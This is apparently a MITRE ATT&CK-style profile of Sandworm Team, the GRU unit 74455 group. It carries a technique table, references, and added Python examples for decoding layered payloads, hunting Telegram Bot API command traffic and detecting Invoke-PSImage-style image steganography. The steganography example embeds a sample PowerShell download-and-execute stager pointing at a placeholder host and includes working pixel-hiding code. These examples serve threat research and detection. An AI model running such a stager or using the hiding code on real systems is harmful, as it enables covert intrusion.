Sandworm Team is a destructive threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) Main Center for Special Technologies (GTsST) military unit 74455. This group has been active since at least 2009.
In October 2020, the US indicted six GRU Unit 74455 officers associated with Sandworm Team for the following cyber operations: the 2015 and 2016 attacks against Ukrainian electrical companies and government organizations, the 2017 worldwide NotPetya attack, targeting of the 2017 French presidential campaign, the 2018 Olympic Destroyer attack against the Winter Olympic Games, the 2018 operation against the Organisation for the Prohibition of Chemical Weapons, and attacks against the country of Georgia in 2018 and 2019. Some of these were conducted with the assistance of GRU Unit 26165, which is also referred to as APT28.
Techniques Used
| Domain | ID | Name | Use |
|---|---|---|---|
| Enterprise | T1087.002 | Account Discovery: Domain Account | |
| Enterprise | T1087.003 | Account Discovery: Email Account | |
| Enterprise | T1583.001 | Acquire Infrastructure: Domains | Sandworm Team has registered domain names and created URLs that are often designed to mimic or spoof legitimate websites, such as email login pages, online file sharing and storage websites, and password reset pages. |
| Enterprise | T1583.004 | Acquire Infrastructure: Server | |
| Enterprise | T1595.002 | Active Scanning: Vulnerability Scanning | |
| Enterprise | T1071.001 | Application Layer Protocol: Web Protocols | |
| Enterprise | T1059.001 | Command and Scripting Interpreter: PowerShell | |
| Enterprise | T1059.005 | Command and Scripting Interpreter: Visual Basic | |
| Enterprise | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | |
| Enterprise | T1132.001 | Data Encoding: Standard Encoding | |
| Enterprise | T1005 | Data from Local System | |
| Enterprise | T1491.002 | Defacement: External Defacement | |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | Sandworm Team's VBS backdoor can decode Base64-encoded data and save it to the %TEMP% folder. The group has also decrypted received information with Triple DES and decompressed it with GZip. |
| Enterprise | T1587.001 | Develop Capabilities: Malware | |
| Enterprise | T1561.002 | Disk Wipe: Disk Structure Wipe | |
| Enterprise | T1499 | Endpoint Denial of Service | |
| Enterprise | T1585.001 | Establish Accounts: Social Media Accounts | |
| Enterprise | T1585.002 | Establish Accounts: Email Accounts | |
| Enterprise | T1041 | Exfiltration Over C2 Channel | |
| Enterprise | T1203 | Exploitation for Client Execution | |
| Enterprise | T1133 | External Remote Services | Sandworm Team has used Dropbear SSH with a hardcoded backdoor password to maintain persistence within the target network. It has also used VPN tunnels established in a legitimate software company's infrastructure to reach the internal networks of that company's users. |
| Enterprise | T1083 | File and Directory Discovery | |
| Enterprise | T1592.002 | Gather Victim Host Information: Software | Sandworm Team has researched software code to enable supply-chain operations, most notably for the 2017 NotPetya attack. It has also collected a list of computers using specific software as part of its targeting efforts. |
| Enterprise | T1589.002 | Gather Victim Identity Information: Email Addresses | |
| Enterprise | T1589.003 | Gather Victim Identity Information: Employee Names | |
| Enterprise | T1590.001 | Gather Victim Network Information: Domain Properties | |
| Enterprise | T1591.002 | Gather Victim Org Information: Business Relationships | |
| Enterprise | T1070.004 | Indicator Removal on Host: File Deletion | |
| Enterprise | T1105 | Ingress Tool Transfer | |
| Enterprise | T1056.001 | Input Capture: Keylogging | |
| Enterprise | T1036.005 | Masquerading: Match Legitimate Name or Location | |
| Enterprise | T1027 | Obfuscated Files or Information | Sandworm Team has used Base64 encoding within malware variants. It has also used ROT13 encoding, AES encryption and zlib compression in its Python-based backdoor. |
| Enterprise | T1588.002 | Obtain Capabilities: Tool | Sandworm Team has acquired open-source tools for some of its operations; for example, it acquired Invoke-PSImage to establish an encrypted channel from a compromised host to its C2 server as part of its preparation for the 2018 Winter Olympics attack. |
| Enterprise | T1588.006 | Obtain Capabilities: Vulnerabilities | In 2017, Sandworm Team conducted technical research related to vulnerabilities associated with websites used by the Korean Sport and Olympic Committee, a Korean power company, and a Korean airport. |
| Enterprise | T1003.001 | OS Credential Dumping: LSASS Memory | |
| Enterprise | T1566.001 | Phishing: Spearphishing Attachment | |
| Enterprise | T1566.002 | Phishing: Spearphishing Link | |
| Enterprise | T1598.003 | Phishing for Information: Spearphishing Link | |
| Enterprise | T1090.001 | Proxy: Internal Proxy | Sandworm Team's BCS-server tool can create an internal proxy server to redirect traffic from the adversary-controlled C2 to internal servers which may not be connected to the internet, but are interconnected locally. |
| Enterprise | T1219 | Remote Access Software | |
| Enterprise | T1018 | Remote System Discovery | |
| Enterprise | T1593 | Search Open Websites/Domains | Sandworm Team researched Ukraine's unique legal entity identifier (the "EDRPOU" number), including running queries on the EDRPOU website, in preparation for the NotPetya attack. It has also researched third-party websites to help it craft credible spearphishing emails. |
| Enterprise | T1594 | Search Victim-Owned Websites | |
| Enterprise | T1505.003 | Server Software Component: Web Shell | |
| Enterprise | T1218.011 | Signed Binary Proxy Execution: Rundll32 | |
| Enterprise | T1195.002 | Supply Chain Compromise: Compromise Software Supply Chain | |
| Enterprise | T1082 | System Information Discovery | |
| Enterprise | T1016 | System Network Configuration Discovery | |
| Enterprise | T1049 | System Network Connections Discovery | Sandworm Team has gathered user, IP address, and server data related to RDP sessions on a compromised host. It has also accessed network diagram files useful for understanding how a host's network was configured. |
| Enterprise | T1033 | System Owner/User Discovery | |
| Enterprise | T1204.001 | User Execution: Malicious Link | |
| Enterprise | T1204.002 | User Execution: Malicious File | |
| Enterprise | T1102.002 | Web Service: Bidirectional Communication | Sandworm Team has used the Telegram Bot API from Telegram Messenger to send and receive commands to its Python backdoor. It also used legitimate M.E.Doc software update check requests for sending and receiving commands, and hosted malicious payloads on putdrive.com. |
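The two decoding pipelines described above (Base64 plus GZip for the VBS backdoor under T1140, and ROT13, Base64 and zlib for the Python backdoor under T1027) can be peeled mechanically once each layer is recognised by its magic bytes or alphabet. The following is an added example written for this page; it is not Sandworm code and not taken from any of the cited reports. It builds constructed samples with those layers and strips them back off. The ordering of the Python backdoor's layers and the sample command are assumptions, and the Triple DES and AES layers are omitted because they cannot be reversed without the key, so an encrypted core is simply handed back untouched.

```python
import base64
import binascii
import codecs
import gzip
import zlib

# Constructed stand-in for a tasking message; not a real Sandworm command.
COMMAND = b'cmd.exe /c whoami /all > "%TEMP%\\out.txt"'

GZIP_MAGIC = b"\x1f\x8b"
# Common zlib stream headers (CMF/FLG pairs for the default 32K window).
ZLIB_HEADERS = {b"\x78\x01", b"\x78\x5e", b"\x78\x9c", b"\x78\xda"}


def layer_python_backdoor(plain: bytes) -> bytes:
    """zlib -> Base64 -> ROT13: the layers the page attributes to the Python backdoor.
    The AES layer is left out (needs the key) and the layer order is an assumption."""
    b64 = base64.b64encode(zlib.compress(plain)).decode("ascii")
    return codecs.encode(b64, "rot13").encode("ascii")


def layer_vbs_backdoor(plain: bytes) -> bytes:
    """GZip -> Base64: what the VBS backdoor is left with after removing Triple DES."""
    return base64.b64encode(gzip.compress(plain))


def _rot13(data: bytes):
    if not data.isascii():
        return None
    return codecs.encode(data.decode("ascii"), "rot13").encode("ascii")


def _b64(data):
    if data is None:
        return None
    try:
        return base64.b64decode(data, validate=True) or None
    except (binascii.Error, ValueError):
        return None


def _plausible(data: bytes) -> bool:
    """Accept a decode when it starts with a known magic or is nearly all printable text.
    A wrong guess (e.g. Base64-decoding ROT13'd text) yields high-entropy garbage."""
    if data[:2] == GZIP_MAGIC or data[:2] in ZLIB_HEADERS:
        return True
    printable = sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13))
    return printable / len(data) >= 0.95


def peel(blob: bytes, max_layers: int = 8):
    """Strip gzip / zlib / Base64 / ROT13+Base64 layers until nothing recognisable remains.
    Returns (core, layers) with layers listed outermost first; an encrypted core
    comes back untouched for the analyst to recover the key separately."""
    layers, cur = [], blob
    for _ in range(max_layers):
        if cur[:2] == GZIP_MAGIC:
            cur, step = gzip.decompress(cur), "gzip"
        elif cur[:2] in ZLIB_HEADERS:
            cur, step = zlib.decompress(cur), "zlib"
        else:
            step = None
            # ROT13 preserves the Base64 alphabet, so both readings decode; keep the
            # one whose output looks like a real next layer.
            for name, text in (("base64", cur), ("rot13+base64", _rot13(cur))):
                dec = _b64(text)
                if dec is not None and dec != cur and _plausible(dec):
                    cur, step = dec, name
                    break
            if step is None:
                break
        layers.append(step)
    return cur, layers


if __name__ == "__main__":
    for name, fn in (("python backdoor", layer_python_backdoor),
                     ("VBS backdoor", layer_vbs_backdoor)):
        core, layers = peel(fn(COMMAND))
        print(f"{name}: {' -> '.join(layers)} -> {core!r}")
```

The plausibility check is what makes the ROT13 guess safe: Base64-decoding ROT13'd text always succeeds because ROT13 maps letters to letters, so the decoder has to judge the output rather than the decode status. On real samples, extend `_plausible` with the magics your analysis cares about (PE, script shebangs, JSON) before loosening the printable-text threshold.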
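For T1102.002, Telegram Bot API traffic is easy to single out once you know its URL shape: every call carries the bot token in the path as `/bot<id>:<secret>/<method>`, which ordinary Telegram clients never do. The following is an added example for this page, not code from the page or from the cited sources: a hunt over constructed proxy log lines that flags Bot API calls, keeps the bot id but deliberately not the secret, counts repeated `getUpdates` polling per source as beaconing, and also flags the putdrive.com staging host named above. The log format, addresses and token are made up; the "at least 30 characters" secret length and the two-poll threshold are assumptions to tune.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed forward-proxy log lines: "timestamp src_ip method url user_agent".
# Hosts, addresses and the bot token are made up for the example.
PROXY_LOG = """\
2018-02-09T12:00:01Z 10.1.4.22 GET https://api.telegram.org/bot8123456:AAHx9c2Qf7Lk3ZpT1vB8nR0sY4wE6uI2oJ5/getUpdates?offset=41 python-requests/2.18.4
2018-02-09T12:00:31Z 10.1.4.22 GET https://api.telegram.org/bot8123456:AAHx9c2Qf7Lk3ZpT1vB8nR0sY4wE6uI2oJ5/getUpdates?offset=42 python-requests/2.18.4
2018-02-09T12:01:01Z 10.1.4.22 POST https://api.telegram.org/bot8123456:AAHx9c2Qf7Lk3ZpT1vB8nR0sY4wE6uI2oJ5/sendDocument python-requests/2.18.4
2018-02-09T12:01:15Z 10.1.4.31 GET https://web.telegram.org/ Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/58.0
2018-02-09T12:01:40Z 10.1.4.40 GET https://putdrive.com/dl/abc123 Mozilla/5.0 (Windows NT 6.1) Chrome/64.0
""".splitlines()

# Bot API paths look like /bot<numeric id>:<secret>/<method>; the secret is commonly 35 chars,
# the regex accepts 30+ to stay tolerant (assumption).
BOT_PATH = re.compile(r"^/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]{30,})/(?P<method>[A-Za-z]+)")
BROWSER_UA = re.compile(r"^Mozilla/")
# Host the page reports Sandworm using to stage payloads; a coarse indicator, tune to your estate.
STAGING_HOSTS = {"putdrive.com"}


def parse_line(line: str) -> dict:
    ts, src, method, url, ua = line.split(maxsplit=4)
    return {"ts": ts, "src": src, "method": method, "url": url, "ua": ua}


def classify(entry: dict):
    """Return a finding for Bot API traffic or a known staging host, else None.
    The bot secret is matched but never copied into the finding."""
    u = urlsplit(entry["url"])
    if u.hostname == "api.telegram.org":
        m = BOT_PATH.match(u.path)
        if m:
            return {"rule": "telegram-bot-api", "src": entry["src"], "bot_id": m["bot_id"],
                    "api_method": m["method"],
                    "non_browser_ua": not BROWSER_UA.match(entry["ua"])}
    if u.hostname in STAGING_HOSTS:
        return {"rule": "known-staging-host", "src": entry["src"], "host": u.hostname}
    return None


def hunt(lines):
    """Per-line findings plus the (src, bot_id) pairs that poll getUpdates repeatedly."""
    findings, polls = [], defaultdict(int)
    for line in lines:
        f = classify(parse_line(line))
        if f is None:
            continue
        findings.append(f)
        if f["rule"] == "telegram-bot-api" and f["api_method"] == "getUpdates":
            polls[(f["src"], f["bot_id"])] += 1
    beacons = {k: n for k, n in polls.items() if n >= 2}
    return findings, beacons


if __name__ == "__main__":
    findings, beacons = hunt(PROXY_LOG)
    for f in findings:
        print(f)
    print("beaconing:", beacons)
```

The web.telegram.org line is left alone on purpose: user traffic to Telegram is not the signal, the Bot API path is. The bot id is worth keeping in the alert because it lets you pivot across hosts polling the same bot, while the secret would let anyone reading the SIEM take over the channel.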
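Invoke-PSImage (T1588.002 above) hides a script in the low 4 bits of two colour values per pixel, so the carrier image still looks normal. The following is an added example written for this page rather than taken from the tool: a minimal embed/extract pair over a raw RGB buffer using the same 4-bits-per-channel idea (the 4-byte length prefix, the gradient cover and the stand-in script are this example's own), followed by the check a defender would want, per-row entropy of the low nibbles, which ASCII script bytes drag well below that of untouched pixels. No PNG container is written; the point is the pixel arithmetic and the detector.

```python
import math
from collections import Counter

WIDTH, HEIGHT = 64, 48   # constructed 8-bit RGB cover, 3 bytes per pixel, no PNG container

# Constructed stand-in for a stager; not a real Sandworm script.
SCRIPT = b"$c = New-Object Net.WebClient; IEX $c.DownloadString('https://stage.example.invalid/p.ps1')"


def make_cover() -> bytes:
    """Smooth diagonal gradient standing in for a photo; its low nibbles are uniform per row."""
    px = bytearray()
    for y in range(HEIGHT):
        for x in range(WIDTH):
            v = (3 * x + 5 * y) & 0xFF
            px += bytes((v, (v + 85) & 0xFF, (v + 170) & 0xFF))
    return bytes(px)


def embed(cover: bytes, payload: bytes) -> bytes:
    """Hide each payload byte in the low 4 bits of one pixel's R and B values
    (4 bits per channel, two channels per pixel, as Invoke-PSImage does).
    The 4-byte length prefix is this example's own framing."""
    data = len(payload).to_bytes(4, "big") + payload
    if len(data) > WIDTH * HEIGHT:
        raise ValueError("payload does not fit in the cover image")
    out = bytearray(cover)
    for i, b in enumerate(data):
        r = 3 * i
        out[r] = (out[r] & 0xF0) | (b >> 4)          # high nibble -> R
        out[r + 2] = (out[r + 2] & 0xF0) | (b & 0x0F)  # low nibble  -> B
    return bytes(out)


def extract(img: bytes) -> bytes:
    """Reverse of embed: read the length prefix, then that many bytes."""
    def byte_at(i):
        return ((img[3 * i] & 0x0F) << 4) | (img[3 * i + 2] & 0x0F)
    n = int.from_bytes(bytes(byte_at(i) for i in range(4)), "big")
    return bytes(byte_at(i) for i in range(4, 4 + n))


def _entropy(values) -> float:
    counts = Counter(values)
    total = sum(counts.values())
    return -sum(c / total * math.log2(c / total) for c in counts.values())


def min_row_entropy(img: bytes, channel: int = 0) -> float:
    """Shannon entropy (bits, max 4.0) of one channel's low nibbles, per row; lowest row wins.
    Script text pushes the R-channel nibbles into a handful of values (the high nibbles
    of ASCII, mostly 2..7), which is what the detector keys on."""
    rows = []
    for y in range(HEIGHT):
        start = 3 * y * WIDTH + channel
        rows.append(_entropy(img[i] & 0x0F for i in range(start, start + 3 * WIDTH, 3)))
    return min(rows)


def looks_embedded(img: bytes, threshold: float = 3.5) -> bool:
    """Heuristic: any row whose low-nibble entropy falls below the threshold (assumed 3.5 bits)."""
    return min_row_entropy(img) < threshold


if __name__ == "__main__":
    cover = make_cover()
    stego = embed(cover, SCRIPT)
    print("round trip ok:", extract(stego) == SCRIPT)
    print("cover min row entropy:", round(min_row_entropy(cover), 2))
    print("stego min row entropy:", round(min_row_entropy(stego), 2))
    print("flagged:", looks_embedded(stego))
```

The threshold is the fragile part: real photographs have noisier low bits than this gradient, and a payload that is compressed or encrypted first (as Sandworm's layering elsewhere on this page would suggest) has near-uniform nibbles and defeats an entropy test. Comparing the R and B low-nibble statistics against the untouched G channel in the same image is a complementary check that survives that case better.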
- Brady, S. W. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al. Retrieved November 25, 2020.
- UK NCSC. (2020, October 19). UK exposes series of Russian cyber attacks against Olympic and Paralympic Games. Retrieved November 30, 2020.
- Hultquist, J. (2016, January 7). Sandworm Team and the Ukrainian Power Authority Attacks. Retrieved October 6, 2017.
- Meyers, A. (2018, January 19). Meet CrowdStrike’s Adversary of the Month for January: VOODOO BEAR. Retrieved May 22, 2018.
- Pompeo, M. (2020, February 20). The United States Condemns Russian Cyber Attack Against the Country of Georgia. Retrieved June 18, 2020.
- NCSC. (2020, February 20). NCSC supports US advisory regarding GRU intrusion set Sandworm. Retrieved June 10, 2020.
- Brady, S. (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al. Retrieved October 1, 2020.
- Dragos. (2017, January 1). ELECTRUM Threat Profile. Retrieved June 10, 2020.
- Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020.
- F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.
- Cherepanov, A. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020.
- Cherepanov, A. (2017, July 4). Analysis of TeleBots’ cunning backdoor. Retrieved June 11, 2020.
- Cherepanov, A. (2016, January 3). BlackEnergy by the SSHBearDoor: attacks against Ukrainian news media and electric industry. Retrieved June 10, 2020.
- Cherepanov, A. (2017, June 30). TeleBots are back: Supply chain attacks against Ukraine. Retrieved June 11, 2020.
- US-CERT. (2016, February 25). ICS Alert (IR-ALERT-H-16-056-01) Cyber-Attack Against Ukrainian Critical Infrastructure. Retrieved June 10, 2020.
- Ward, S. (2014, October 14). iSIGHT discovers zero-day vulnerability CVE-2014-4114 used in Russian cyber-espionage campaign. Retrieved June 10, 2020.
- Wu, W. (2014, October 14). An Analysis of Windows Zero-day Vulnerability ‘CVE-2014-4114’ aka “Sandworm”. Retrieved June 18, 2020.
- Li, H. (2013, November 5). McAfee Labs Detects Zero-Day Exploit Targeting Microsoft Office. Retrieved June 18, 2020.
- ANSSI. (2021, January 27). Sandworm Intrusion Set Campaign Targeting Centreon Systems. Retrieved March 30, 2021.
- Counter Threat Research Team. (2017, June 28). NotPetya Campaign: What We Know About the Latest Global Ransomware Attack. Retrieved June 11, 2020.
- Leonard, B., Mehta, N. (2019, November 21). The Secret Life of Sandworms. Retrieved December 31, 2020.
- Cherepanov, A., Lipovsky, R. (2018, October 11). New TeleBots backdoor: First evidence linking Industroyer to NotPetya. Retrieved November 27, 2018.
- CrowdStrike. (2019, January). 2019 Global Threat Report. Retrieved June 10, 2020.